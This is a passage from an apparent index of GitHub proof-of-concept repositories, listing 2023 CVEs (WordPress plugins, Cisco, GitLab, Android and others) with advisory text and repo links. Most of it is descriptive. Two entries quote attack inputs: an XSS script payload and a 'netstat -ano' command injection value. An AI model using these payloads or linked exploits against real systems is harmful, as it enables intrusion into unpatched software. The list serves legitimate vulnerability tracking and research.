- [miguelc49/CVE-2023-5720-2](https://github.com/miguelc49/CVE-2023-5720-2)
- [miguelc49/CVE-2023-5720-1](https://github.com/miguelc49/CVE-2023-5720-1)
- [miguelc49/CVE-2023-5720-3](https://github.com/miguelc49/CVE-2023-5720-3)

### CVE-2023-5808 (2023-12-04)

SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in a Storage administrative role are able to access HNAS configuration backup and diagnostic data, that would normally be barred to that specific administrative role.

- [Arszilla/CVE-2023-5808](https://github.com/Arszilla/CVE-2023-5808)

### CVE-2023-5961 (2023-12-23)

A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user.

- [HadessCS/CVE-2023-5961](https://github.com/HadessCS/CVE-2023-5961)

### CVE-2023-5965 (2023-11-30)

An authenticated privileged attacker could upload a specially crafted zip to the EspoCRM server in version 7.2.5, via the update form, which could lead to arbitrary PHP code execution.

- [pedrojosenavasperez/cve-2023-5965](https://github.com/pedrojosenavasperez/cve-2023-5965)

### CVE-2023-5966 (2023-11-30)

An authenticated privileged attacker could upload a specially crafted zip to the EspoCRM server in version 7.2.5, via the extension deployment form, which could lead to arbitrary PHP code execution.

- [pedrojosenavasperez/cve-2023-5966](https://github.com/pedrojosenavasperez/cve-2023-5966)

### CVE-2023-6019 (2023-11-16)

A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023

- [FireWolfWang/CVE-2023-6019](https://github.com/FireWolfWang/CVE-2023-6019)
- [miguelc49/CVE-2023-6019-2](https://github.com/miguelc49/CVE-2023-6019-2)
- [miguelc49/CVE-2023-6019-1](https://github.com/miguelc49/CVE-2023-6019-1)
- [miguelc49/CVE-2023-6019-3](https://github.com/miguelc49/CVE-2023-6019-3)
- [Clydeston/CVE-2023-6019](https://github.com/Clydeston/CVE-2023-6019)

### CVE-2023-6036 (2024-02-12)

The Web3 WordPress plugin before 3.0.0 is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in the functions 'handle_auth_request' and 'hadle_login_request'. This makes it possible for non-authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.

- [pctripsesp/CVE-2023-6036](https://github.com/pctripsesp/CVE-2023-6036)

### CVE-2023-6063 (2023-12-04)

The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.

- [motikan2010/CVE-2023-6063-PoC](https://github.com/motikan2010/CVE-2023-6063-PoC)
- [hackersroot/CVE-2023-6063-PoC](https://github.com/hackersroot/CVE-2023-6063-PoC)
- [thesafdari/CVE-2023-6063](https://github.com/thesafdari/CVE-2023-6063)

### CVE-2023-6241 (2024-03-04)

Use After Free vulnerability in Arm Ltd Midgard GPU Kernel Driver, Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to exploit a software race condition to perform improper memory processing operations. If the system's memory is carefully prepared by the user, then this in turn causes a use-after-free. This issue affects Midgard GPU Kernel Driver: from r13p0 through r32p0; Bifrost GPU Kernel Driver: from r11p0 through r25p0; Valhall GPU Kernel Driver: from r19p0 through r25p0, from r29p0 through r46p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r46p0.

- [s1204IT/CVE-2023-6241](https://github.com/s1204IT/CVE-2023-6241)

### CVE-2023-6246 (2024-01-31)

A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer.

- [elpe-pinillo/CVE-2023-6246](https://github.com/elpe-pinillo/CVE-2023-6246)

### CVE-2023-6275 (2023-11-24)

A problematic vulnerability was identified in TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1. It concerns an unspecified function of the file /mobileredir/openApp.jsp of the component mobileredir. Manipulation of the argument redirectUrl/user with the input "><script>alert(document.domain)</script> leads to cross site scripting. The attack can be carried out over the network. The exploit is publicly available. Upgrading to version 1.7.1-231128, 1.8.0-231127 and 1.8.1-231127 addresses this issue. Applying an upgrade is the recommended mitigation.

- [erickfernandox/CVE-2023-6275](https://github.com/erickfernandox/CVE-2023-6275)

### CVE-2023-6289 (2023-12-18)

The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens.

- [RandomRobbieBF/CVE-2023-6289](https://github.com/RandomRobbieBF/CVE-2023-6289)

### CVE-2023-6319 (2024-04-09)

A command injection vulnerability exists in the getAudioMetadata method from the com.webos.service.attachedstoragemanager service on webOS version 4 through 7. A series of specially crafted requests can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability. Affected devices:

- webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA
- webOS 5.5.0 - 04.50.51 running on OLED55CXPUA
- webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB
- webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA

- [illixion/root-my-webos-tv](https://github.com/illixion/root-my-webos-tv)

### CVE-2023-6350 (2023-11-29)

Use after free in libavif in Google Chrome prior to 119.0.6045.199 allowed a remote attacker to potentially exploit heap corruption via a crafted avif file. (Chromium security severity: High)

- [dywsy21/CVE-2023-6350_Reproduction](https://github.com/dywsy21/CVE-2023-6350_Reproduction)

### CVE-2023-6421 (2024-01-01)

The Download Manager WordPress plugin before 3.2.83 does not protect file downloads' passwords, leaking them upon receiving an invalid one.

- [RandomRobbieBF/CVE-2023-6421](https://github.com/RandomRobbieBF/CVE-2023-6421)

### CVE-2023-6444 (2024-03-11)

The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request.

- [Wayne-Ker/CVE-2023-6444-POC](https://github.com/Wayne-Ker/CVE-2023-6444-POC)

### CVE-2023-6538 (2023-12-11)

SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in Storage, Server or combined Server+Storage administrative roles are able to access SMU configuration backup, that would normally be barred to those specific administrative roles.

- [Arszilla/CVE-2023-6538](https://github.com/Arszilla/CVE-2023-6538)

### CVE-2023-6553 (2023-12-15)

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.

- [Chocapikk/CVE-2023-6553](https://github.com/Chocapikk/CVE-2023-6553)
- [motikan2010/CVE-2023-6553-PoC](https://github.com/motikan2010/CVE-2023-6553-PoC)
- [kiddenta/CVE-2023-6553](https://github.com/kiddenta/CVE-2023-6553)
- [cc3305/CVE-2023-6553](https://github.com/cc3305/CVE-2023-6553)

### CVE-2023-6567 (2024-01-11)

The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order_by’ parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [mimiloveexe/CVE-2023-6567-poc](https://github.com/mimiloveexe/CVE-2023-6567-poc)

### CVE-2023-6595 (2023-12-14)

In WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate ancillary credential information stored within WhatsUp Gold.

- [sharmashreejaa/CVE-2023-6595](https://github.com/sharmashreejaa/CVE-2023-6595)

### CVE-2023-6634 (2024-01-11)

The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.

- [krn966/CVE-2023-6634](https://github.com/krn966/CVE-2023-6634)

### CVE-2023-6654 (2023-12-10)

A critical vulnerability was discovered in PHPEMS 6.x/7.x/8.x/9.0. Affected is an unknown function in the library lib/session.cls.php of the component Session Data Handler. Manipulation with unknown data leads to a deserialization vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [qfmy1024/CVE-2023-6654](https://github.com/qfmy1024/CVE-2023-6654)

### CVE-2023-6661
- [cli-ish/CVE-2023-6661](https://github.com/cli-ish/CVE-2023-6661)

### CVE-2023-6663
- [cli-ish/CVE-2023-6663](https://github.com/cli-ish/CVE-2023-6663)

### CVE-2023-6700 (2024-02-05)

The Cookie Information | Free GDPR Consent Solution plugin for WordPress is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler in versions up to, and including, 2.0.22. This makes it possible for authenticated attackers, with subscriber-level access or higher, to edit arbitrary site options which can be used to create administrator accounts.

- [RandomRobbieBF/CVE-2023-6700](https://github.com/RandomRobbieBF/CVE-2023-6700)

### CVE-2023-6702 (2023-12-14)

Type confusion in V8 in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

- [kaist-hacking/CVE-2023-6702](https://github.com/kaist-hacking/CVE-2023-6702)

### CVE-2023-6710 (2023-12-12)

A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the 'alias' parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page.

- [DedSec-47/Metasploit-Exploits-CVE-2023-6710](https://github.com/DedSec-47/Metasploit-Exploits-CVE-2023-6710)
- [DedSec-47/CVE-2023-6710](https://github.com/DedSec-47/CVE-2023-6710)

### CVE-2023-6875 (2024-01-11)

The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover.

- [UlyssesSaicha/CVE-2023-6875](https://github.com/UlyssesSaicha/CVE-2023-6875)
- [gbrsh/CVE-2023-6875](https://github.com/gbrsh/CVE-2023-6875)
- [hatlesswizard/CVE-2023-6875](https://github.com/hatlesswizard/CVE-2023-6875)

### CVE-2023-6895 (2023-12-17)

A vulnerability was identified in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been rated as critical. It affects unknown code of the file /php/ping.php. Manipulation of the argument jsondata[ip] with the input netstat -ano leads to OS command injection. The exploit is publicly available. Upgrading to version 4.1.0 addresses this issue. Applying an upgrade is the recommended mitigation.

- [FuBoLuSec/CVE-2023-6895](https://github.com/FuBoLuSec/CVE-2023-6895)
- [nles-crt/CVE-2023-6895](https://github.com/nles-crt/CVE-2023-6895)

### CVE-2023-6933 (2024-02-05)

The Better Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.

- [w2xim3/CVE-2023-6933](https://github.com/w2xim3/CVE-2023-6933)

### CVE-2023-6985 (2024-02-05)

The 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.

- [RandomRobbieBF/CVE-2023-6985](https://github.com/RandomRobbieBF/CVE-2023-6985)

### CVE-2023-7016 (2024-02-27)

A flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows allows an attacker to execute code at a SYSTEM level via local access.

- [ewilded/CVE-2023-7016-POC](https://github.com/ewilded/CVE-2023-7016-POC)

### CVE-2023-7028 (2024-01-12)

An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.

- [RandomRobbieBF/CVE-2023-7028](https://github.com/RandomRobbieBF/CVE-2023-7028)
- [googlei1996/CVE-2023-7028](https://github.com/googlei1996/CVE-2023-7028)
- [duy-31/CVE-2023-7028](https://github.com/duy-31/CVE-2023-7028)
- [Vozec/CVE-2023-7028](https://github.com/Vozec/CVE-2023-7028)
- [yoryio/CVE-2023-7028](https://github.com/yoryio/CVE-2023-7028)
- [Esonhugh/gitlab_honeypot](https://github.com/Esonhugh/gitlab_honeypot)
- [Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab](https://github.com/Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab)
- [thanhlam-attt/CVE-2023-7028](https://github.com/thanhlam-attt/CVE-2023-7028)
- [Trackflaw/CVE-2023-7028-Docker](https://github.com/Trackflaw/CVE-2023-7028-Docker)
- [mochammadrafi/CVE-2023-7028](https://github.com/mochammadrafi/CVE-2023-7028)
- [hackeremmen/gitlab-exploit](https://github.com/hackeremmen/gitlab-exploit)
- [soltanali0/CVE-2023-7028](https://github.com/soltanali0/CVE-2023-7028)
- [fa-rrel/CVE-2023-7028](https://github.com/fa-rrel/CVE-2023-7028)

### CVE-2023-7172 (2023-12-30)

A critical vulnerability was discovered in PHPGurukul Hospital Management System 1.0. It concerns an unspecified function of the component Admin Dashboard. Manipulation with unknown data leads to SQL injection. The attack can be carried out over the network. The exploit is publicly available.

- [sharathc213/CVE-2023-7172](https://github.com/sharathc213/CVE-2023-7172)

### CVE-2023-7173 (2023-12-30)

A problematic vulnerability was found in PHPGurukul Hospital Management System 1.0. It concerns an unspecified function of the file registration.php. Manipulation of the argument First Name with unknown data leads to cross site scripting. The attack can be carried out over the network. The exploit is publicly available.

- [sharathc213/CVE-2023-7173](https://github.com/sharathc213/CVE-2023-7173)

### CVE-2023-20025 (2023-01-19)

A vulnerability in the web-based management interface of Cisco Small Business RV042 Series Routers could allow an unauthenticated, remote attacker to bypass authentication on the affected device. This vulnerability is due to incorrect user input validation of incoming HTTP packets. An attacker could exploit this vulnerability by sending crafted requests to the web-based management interface. A successful exploit could allow the attacker to gain root privileges on the affected device.

- [lnversed/CVE-2023-20025](https://github.com/lnversed/CVE-2023-20025)

### CVE-2023-20048 (2023-11-01)

A vulnerability in the web services interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to execute certain unauthorized configuration commands on a Firepower Threat Defense (FTD) device that is managed by the FMC Software. This vulnerability is due to insufficient authorization of configuration commands that are sent through the web service interface. An attacker could exploit this vulnerability by authenticating to the FMC web services interface and sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute certain configuration commands on the targeted FTD device. To successfully exploit this vulnerability, an attacker would need valid credentials on the FMC Software.

- [0zer0d4y/FuegoTest](https://github.com/0zer0d4y/FuegoTest)

### CVE-2023-20052 (2023-02-16)

On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed: A vulnerability in the DMG file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to access sensitive information on an affected device. This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection. An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to leak bytes from any file that may be read by the ClamAV scanning process.

- [nokn0wthing/CVE-2023-20052](https://github.com/nokn0wthing/CVE-2023-20052)
- [cY83rR0H1t/CVE-2023-20052](https://github.com/cY83rR0H1t/CVE-2023-20052)

### CVE-2023-20073 (2023-04-05)

A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.

- [RegularITCat/CVE-2023-20073](https://github.com/RegularITCat/CVE-2023-20073)

### CVE-2023-20110 (2023-05-18)

A vulnerability in the web-based management interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. This vulnerability exists because the web-based management interface inadequately validates user input. An attacker could exploit this vulnerability by authenticating to the application as a low-privileged user and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to read sensitive data on the underlying database.

- [redfr0g/CVE-2023-20110](https://github.com/redfr0g/CVE-2023-20110)

### CVE-2023-20126 (2023-05-04)

A vulnerability in the web-based management interface of Cisco SPA112 2-Port Phone Adapters could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to a missing authentication process within the firmware upgrade function. An attacker could exploit this vulnerability by upgrading an affected device to a crafted version of firmware. A successful exploit could allow the attacker to execute arbitrary code on the affected device with full privileges. Cisco has not released firmware updates to address this vulnerability.

- [fullspectrumdev/RancidCrisco](https://github.com/fullspectrumdev/RancidCrisco)

### CVE-2023-20178 (2023-06-28)

A vulnerability in the client update process of Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows could allow a low-privileged, authenticated, local attacker to elevate privileges to those of SYSTEM. The client update process is executed after a successful VPN connection is established. This vulnerability exists because improper permissions are assigned to a temporary directory that is created during the update process. An attacker could exploit this vulnerability by abusing a specific function of the Windows installer process. A successful exploit could allow the attacker to execute code with SYSTEM privileges.

- [Wh04m1001/CVE-2023-20178](https://github.com/Wh04m1001/CVE-2023-20178)

### CVE-2023-20198 (2023-10-16)

Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system. Cisco has assigned CVE-2023-20273 to this issue. CVE-2023-20198 has been assigned a CVSS Score of 10.0. CVE-2023-20273 has been assigned a CVSS Score of 7.2. Both of these CVEs are being tracked by CSCwh87343.

- [raystr-atearedteam/CVE-2023-20198-checker](https://github.com/raystr-atearedteam/CVE-2023-20198-checker)
- [Atea-Redteam/CVE-2023-20198](https://github.com/Atea-Redteam/CVE-2023-20198)
- [securityphoenix/cisco-CVE-2023-20198-tester](https://github.com/securityphoenix/cisco-CVE-2023-20198-tester)
- [emomeni/Simple-Ansible-for-CVE-2023-20198](https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198)
- [ZephrFish/CVE-2023-20198-Checker](https://github.com/ZephrFish/CVE-2023-20198-Checker)
- [JoyGhoshs/CVE-2023-20198](https://github.com/JoyGhoshs/CVE-2023-20198)
- [Tounsi007/CVE-2023-20198](https://github.com/Tounsi007/CVE-2023-20198)
- [alekos3/CVE_2023_20198_Detector](https://github.com/alekos3/CVE_2023_20198_Detector)
- [reket99/Cisco_CVE-2023-20198](https://github.com/reket99/Cisco_CVE-2023-20198)
- [iveresk/cve-2023-20198](https://github.com/iveresk/cve-2023-20198)
- [sohaibeb/CVE-2023-20198](https://github.com/sohaibeb/CVE-2023-20198)
- [fox-it/cisco-ios-xe-implant-detection](https://github.com/fox-it/cisco-ios-xe-implant-detection)
- [Pushkarup/CVE-2023-20198](https://github.com/Pushkarup/CVE-2023-20198)
- [Shadow0ps/CVE-2023-20198-Scanner](https://github.com/Shadow0ps/CVE-2023-20198-Scanner)
- [kacem-expereo/CVE-2023-20198](https://github.com/kacem-expereo/CVE-2023-20198)
- [mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner](https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner)
- [ohlawd/CVE-2023-20198](https://github.com/ohlawd/CVE-2023-20198)
- [IceBreakerCode/CVE-2023-20198](https://github.com/IceBreakerCode/CVE-2023-20198)
- [RevoltSecurities/CVE-2023-20198](https://github.com/RevoltSecurities/CVE-2023-20198)
- [smokeintheshell/CVE-2023-20198](https://github.com/smokeintheshell/CVE-2023-20198)
- [netbell/CVE-2023-20198-Fix](https://github.com/netbell/CVE-2023-20198-Fix)
- [Vulnmachines/Cisco_CVE-2023-20198](https://github.com/Vulnmachines/Cisco_CVE-2023-20198)
- [W01fh4cker/CVE-2023-20198-RCE](https://github.com/W01fh4cker/CVE-2023-20198-RCE)
- [sanan2004/CVE-2023-20198](https://github.com/sanan2004/CVE-2023-20198)
- [AhmedMansour93/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-](https://github.com/AhmedMansour93/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-)

### CVE-2023-20209 (2023-08-16)

A vulnerability in the web-based management interface of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker with read-write privileges on the application to perform a command injection attack that could result in remote code execution on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to establish a remote shell with root privileges.

- [peter5he1by/CVE-2023-20209](https://github.com/peter5he1by/CVE-2023-20209)

### CVE-2023-20273 (2023-10-24)

A vulnerability in the web UI feature of Cisco IOS XE Software could allow an authenticated, remote attacker to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the attacker to inject commands to the underlying operating system with root privileges.

- [smokeintheshell/CVE-2023-20273](https://github.com/smokeintheshell/CVE-2023-20273)

### CVE-2023-20562 (2023-08-08)

Insufficient validation in the IOCTL (Input Output Control) input buffer in AMD uProf may allow an authenticated user to load an unsigned driver potentially leading to arbitrary kernel execution.

- [zeze-zeze/HITCON-2023-Demo-CVE-2023-20562](https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562)
- [passwa11/HITCON-2023-Demo-CVE-2023-20562](https://github.com/passwa11/HITCON-2023-Demo-CVE-2023-20562)

### CVE-2023-20573 (2024-01-11)

A privileged attacker can prevent delivery of debug exceptions to SEV-SNP guests, potentially resulting in guests not receiving expected debug information.

- [Freax13/cve-2023-20573-poc](https://github.com/Freax13/cve-2023-20573-poc)

### CVE-2023-20593 (2023-07-24)

An issue in "Zen 2" CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.

- [sbaresearch/stop-zenbleed-win](https://github.com/sbaresearch/stop-zenbleed-win)

### CVE-2023-20598 (2023-10-17)

An improper privilege management in the AMD Radeon™ Graphics driver may allow an authenticated attacker to craft an IOCTL request to gain I/O control over arbitrary hardware ports or physical addresses, resulting in a potential arbitrary code execution.

- [H4rk3nz0/CVE-2023-20598-PDFWKRNL](https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL)

### CVE-2023-20860 (2023-03-27)

Spring Framework running version 6.0.0 - 6.0.6 or 5.3.0 - 5.3.25 using "**" as a pattern in Spring Security configuration with the mvcRequestMatcher creates a mismatch in pattern matching between Spring Security and Spring MVC, and the potential for a security bypass.

- [limo520/CVE-2023-20860](https://github.com/limo520/CVE-2023-20860)

### CVE-2023-20872 (2023-04-25)

VMware Workstation and Fusion contain an out-of-bounds read/write vulnerability in SCSI CD/DVD device emulation.

- [ze0r/vmware-escape-CVE-2023-20872-poc](https://github.com/ze0r/vmware-escape-CVE-2023-20872-poc)

### CVE-2023-20887 (2023-06-07)

Aria Operations for Networks contains a command injection vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in remote code execution.

- [sinsinology/CVE-2023-20887](https://github.com/sinsinology/CVE-2023-20887)
- [miko550/CVE-2023-20887](https://github.com/miko550/CVE-2023-20887)
- [Malwareman007/CVE-2023-20887](https://github.com/Malwareman007/CVE-2023-20887)

### CVE-2023-20909 (2023-04-19)

In multiple functions of RunningTasks.java, there is a possible privilege escalation due to a missing privilege check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11 Android-12 Android-12L Android-13. Android ID: A-243130512

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909)
- [Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909)

### CVE-2023-20911 (2023-03-24)

In addPermission of PermissionManagerServiceImpl.java, there is a possible failure to persist permission settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11 Android-12 Android-12L Android-13. Android ID: A-242537498

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911)

### CVE-2023-20918 (2023-07-12)

In getPendingIntentLaunchFlags of ActivityOptions.java, there is a possible elevation of privilege due to a confused deputy with no additional execution privileges needed. User interaction is not needed for exploitation.

- [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918)
- [Trinadh465/platform_frameworks_base_CVE-2023-20918](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-20918)

### CVE-2023-20921 (2023-01-24)

In onPackageRemoved of AccessibilityManagerService.java, there is a possibility to automatically grant accessibility services due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L Android-13. Android ID: A-243378132

- [Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921](https://github.com/Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921)

### CVE-2023-20933 (2023-02-28)

In several functions of MediaCodec.cpp, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L Android-13. Android ID: A-245860753

- [Trinadh465/frameworks_av_CVE-2023-20933](https://github.com/Trinadh465/frameworks_av_CVE-2023-20933)
- [hshivhare67/platform_frameworks_av_AOSP10_r33_CVE-2023-20933](https://github.com/hshivhare67/platform_frameworks_av_AOSP10_r33_CVE-2023-20933)

### CVE-2023-20943 (2023-02-28)

In clearApplicationUserData of ActivityManagerService.java, there is a possible way to remove system files due to a path traversal error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L Android-13. Android ID: A-240267890

- [Trinadh465/frameworks_base_CVE-2023-20943](https://github.com/Trinadh465/frameworks_base_CVE-2023-20943)
- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20943](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20943)

### CVE-2023-20944 (2023-02-28)

In run of ChooseTypeAndAccountActivity.java, there is a possible escalation of privilege due to unsafe deserialization. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L Android-13. Android ID: A-244154558

- [Trinadh465/frameworks_base_CVE-2023-20944](https://github.com/Trinadh465/frameworks_base_CVE-2023-20944)
- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20944](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20944)

### CVE-2023-20945 (2023-02-28)

In phNciNfc_MfCreateXchgDataHdr of phNxpExtns_MifareStd.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-246932269

- [Ailenchick/CVE-2023-20945](https://github.com/Ailenchick/CVE-2023-20945)

### CVE-2023-20955 (2023-03-24)

In onPrepareOptionsMenu of AppInfoDashboardFragment.java, there is a possible way to bypass admin restrictions and uninstall applications for all users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11 Android-12 Android-12L Android-13. Android ID: A-258653813

- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955)

### CVE-2023-20963 (2023-03-24)

In WorkSource, there is a possible parcel mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11 Android-12 Android-12L Android-13. Android ID: A-220302519

- [pwnipc/BadParcel](https://github.com/pwnipc/BadParcel)
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963)
- [Ailenchick/CVE-2023-20963](https://github.com/Ailenchick/CVE-2023-20963)

### CVE-2023-21036 (2023-03-24)

